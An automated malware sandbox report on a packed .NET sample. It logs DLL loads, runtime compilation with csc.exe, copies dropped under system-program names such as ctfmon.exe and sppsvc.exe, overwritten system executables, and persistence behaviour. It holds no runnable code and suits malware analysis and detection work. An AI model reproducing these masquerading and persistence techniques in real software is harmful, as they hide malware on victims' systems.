Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Section loaded: apphelp.dll
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Section loaded: ktmw32.dll
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Section loaded: propsys.dll
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Section loaded: edputil.dll
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Section loaded: urlmon.dll
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Section loaded: iertutil.dll
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Section loaded: srvcli.dll
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Section loaded: netutils.dll
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Section loaded: wintypes.dll
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Section loaded: appresolver.dll
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Section loaded: bcp47langs.dll
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Section loaded: slc.dll
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Section loaded: userenv.dll
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Section loaded: sppc.dll
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Section loaded: mpr.dll
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Section loaded: pcacli.dll
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Section loaded: sfc_os.dll
Source: C:\Recovery\ctfmon.exe	Section loaded: mscoree.dll
Source: C:\Recovery\ctfmon.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\ctfmon.exe	Section loaded: version.dll
Source: C:\Recovery\ctfmon.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\ctfmon.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\ctfmon.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\ctfmon.exe	Section loaded: uxtheme.dll
Source: C:\Recovery\ctfmon.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\ctfmon.exe	Section loaded: wldp.dll
Source: C:\Recovery\ctfmon.exe	Section loaded: profapi.dll
Source: C:\Recovery\ctfmon.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\ctfmon.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\ctfmon.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\ctfmon.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Section loaded: apphelp.dll
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Section loaded: sspicli.dll
Source: C:\Recovery\ctfmon.exe	Section loaded: mscoree.dll
Source: C:\Recovery\ctfmon.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\ctfmon.exe	Section loaded: version.dll
Source: C:\Recovery\ctfmon.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\ctfmon.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\ctfmon.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\ctfmon.exe	Section loaded: uxtheme.dll
Source: C:\Recovery\ctfmon.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\ctfmon.exe	Section loaded: wldp.dll
Source: C:\Recovery\ctfmon.exe	Section loaded: profapi.dll
Source: C:\Recovery\ctfmon.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\ctfmon.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\ctfmon.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\ctfmon.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: version.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: wldp.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: profapi.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: ktmw32.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: propsys.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: edputil.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: netutils.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: slc.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: userenv.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: sppc.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: mpr.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: pcacli.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: sfc_os.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: version.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: wldp.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: profapi.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: ktmw32.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: amsi.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: userenv.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: rasman.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: propsys.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: dlnashext.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: wpdshext.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: edputil.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: netutils.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: slc.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: sppc.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll

Source: C:\Users\user\Desktop\VIyu4dC9CU.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\VIyu4dC9CU.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Directory created: C:\Program Files\Windows Sidebar\Gadgets\TDdwNhXdQzDImnznNSm.exe	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Directory created: C:\Program Files\Windows Sidebar\Gadgets\7d63bcb2074184	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Directory created: C:\Program Files\Google\Chrome\TDdwNhXdQzDImnznNSm.exe	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Directory created: C:\Program Files\Google\Chrome\7d63bcb2074184	Jump to behavior

Source: VIyu4dC9CU.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: VIyu4dC9CU.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: VIyu4dC9CU.exe

Static file information: File size 2023936 > 1048576

Source: VIyu4dC9CU.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x1eda00

Source: VIyu4dC9CU.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: ;C:\Users\user\AppData\Local\Temp\xml2dols\xml2dols.pdb source: VIyu4dC9CU.exe, 00000000.00000002.1296943431.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: ;C:\Users\user\AppData\Local\Temp\gsjdpjdw\gsjdpjdw.pdb source: VIyu4dC9CU.exe, 00000000.00000002.1296943431.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: ctfmon.exe, 00000013.00000002.1430228599.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, VIyu4dC9CU.exe, 0000002F.00000002.1920621978.000000001AF70000.00000004.00000020.00020000.00000000.sdmp, sppsvc.exe, 00000038.00000002.1844383709.000000000123B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb9 source: ctfmon.exe, 00000013.00000002.1468436451.000000001B2CC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb&+ source: ctfmon.exe, 00000013.00000002.1468436451.000000001B2CC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: ctfmon.exe, 00000013.00000002.1430228599.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, VIyu4dC9CU.exe, 0000002F.00000002.1920621978.000000001AF70000.00000004.00000020.00020000.00000000.sdmp, sppsvc.exe, 00000038.00000002.1844383709.000000000123B000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xml2dols\xml2dols.cmdline"
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gsjdpjdw\gsjdpjdw.cmdline"
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xml2dols\xml2dols.cmdline"	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gsjdpjdw\gsjdpjdw.cmdline"	Jump to behavior

Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Code function: 0_2_00007FFAACBB5CF1 push edx; ret	0_2_00007FFAACBB5EFA
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Code function: 0_2_00007FFAACBB755D push ebx; iretd	0_2_00007FFAACBB756A
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Code function: 0_2_00007FFAACBB60CA push esp; ret	0_2_00007FFAACBB60FA
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Code function: 0_2_00007FFAACBB129B push esi; ret	0_2_00007FFAACBB135F
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Code function: 0_2_00007FFAACBB6259 push ebp; ret	0_2_00007FFAACBB627A
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Code function: 0_2_00007FFAACBB59FE push eax; ret	0_2_00007FFAACBB5A1A
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Code function: 0_2_00007FFAACBB6E35 push edi; ret	0_2_00007FFAACBB6E6E
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Code function: 0_2_00007FFAACBB6C45 push eax; ret	0_2_00007FFAACBB6C6D
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Code function: 0_2_00007FFAACBB5C69 push ecx; ret	0_2_00007FFAACBB5C6A
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Code function: 0_2_00007FFAACBB6C6F push eax; ret	0_2_00007FFAACBB6C6D
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Code function: 0_2_00007FFAACBB5FC1 push esp; ret	0_2_00007FFAACBB60FA
Source: C:\Recovery\ctfmon.exe	Code function: 19_2_00007FFAACBD755D push ebx; iretd	19_2_00007FFAACBD756A
Source: C:\Recovery\ctfmon.exe	Code function: 19_2_00007FFAACBD0C50 push esi; ret	19_2_00007FFAACBD135F
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Code function: 21_2_00007FFAAC7C71FE push ds; retf	21_2_00007FFAAC7C71FF
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Code function: 21_2_00007FFAAC7F55BD push edi; iretd	21_2_00007FFAAC7F55D6
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Code function: 21_2_00007FFAACBB5CF1 push edx; ret	21_2_00007FFAACBB5EFA
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Code function: 21_2_00007FFAACBB60CA push esp; ret	21_2_00007FFAACBB60FA
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Code function: 21_2_00007FFAACBB7055 pushad ; ret	21_2_00007FFAACBB706A
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Code function: 21_2_00007FFAACBB6259 push ebp; ret	21_2_00007FFAACBB627A
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Code function: 21_2_00007FFAACBB5C69 push ecx; ret	21_2_00007FFAACBB5C6A
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Code function: 21_2_00007FFAACBB59FE push eax; ret	21_2_00007FFAACBB5A1A
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Code function: 21_2_00007FFAACBB5FC1 push esp; ret	21_2_00007FFAACBB60FA
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Code function: 30_2_00007FFAAC7900BD pushad ; iretd	30_2_00007FFAAC7900C1
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Code function: 30_2_00007FFAACB9755C push ebx; iretd	30_2_00007FFAACB9756A
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Code function: 30_2_00007FFAACB90C50 push esi; ret	30_2_00007FFAACB9135F
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Code function: 35_2_00007FFAAC8155BD push edi; iretd	35_2_00007FFAAC8155D6
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Code function: 35_2_00007FFAAC7E71FE push ds; retf	35_2_00007FFAAC7E71FF
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Code function: 40_2_00007FFAAC7D71FE push ds; retf	40_2_00007FFAAC7D71FF
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Code function: 41_2_00007FFAAC7A71FE push ds; retf	41_2_00007FFAAC7A71FF
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Code function: 41_2_00007FFAAC7900BD pushad ; iretd	41_2_00007FFAAC7900C1
Source: C:\Recovery\ctfmon.exe	Code function: 42_2_00007FFAAC7D71FE push ds; retf	42_2_00007FFAAC7D71FF

Source: VIyu4dC9CU.exe	Static PE information: section name: .text entropy: 7.572941728975947
Source: TDdwNhXdQzDImnznNSm.exe.0.dr	Static PE information: section name: .text entropy: 7.572941728975947
Source: ctfmon.exe.0.dr	Static PE information: section name: .text entropy: 7.572941728975947
Source: TDdwNhXdQzDImnznNSm.exe0.0.dr	Static PE information: section name: .text entropy: 7.572941728975947
Source: TDdwNhXdQzDImnznNSm.exe1.0.dr	Static PE information: section name: .text entropy: 7.572941728975947
Source: sppsvc.exe.0.dr	Static PE information: section name: .text entropy: 7.572941728975947

Persistence and Installation Behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	System file written: C:\Windows\System32\SecurityHealthSystray.exe			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe			Jump to behavior

Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	File created: C:\Users\user\Desktop\NJzXBuON.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	File created: C:\Users\user\Desktop\mwFSlUNE.log	Jump to dropped file
Source: C:\Recovery\ctfmon.exe	File created: C:\Users\user\Desktop\aGreoIOy.log	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Windows\System32\SecurityHealthSystray.exe	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	File created: C:\Users\user\Desktop\UXfGEDIo.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	File created: C:\Users\user\Desktop\pDLUlABc.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	File created: C:\Users\user\Desktop\OvnXGXyF.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	File created: C:\Users\user\Desktop\PtwPpPmY.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	File created: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Jump to dropped file
Source: C:\Recovery\ctfmon.exe	File created: C:\Users\user\Desktop\RYXOEfJQ.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	File created: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	File created: C:\Users\user\Desktop\OsAnoSoB.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	File created: C:\Users\user\Desktop\FUcZRGSD.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	File created: C:\Users\user\Desktop\eoPexdBD.log	Jump to dropped file
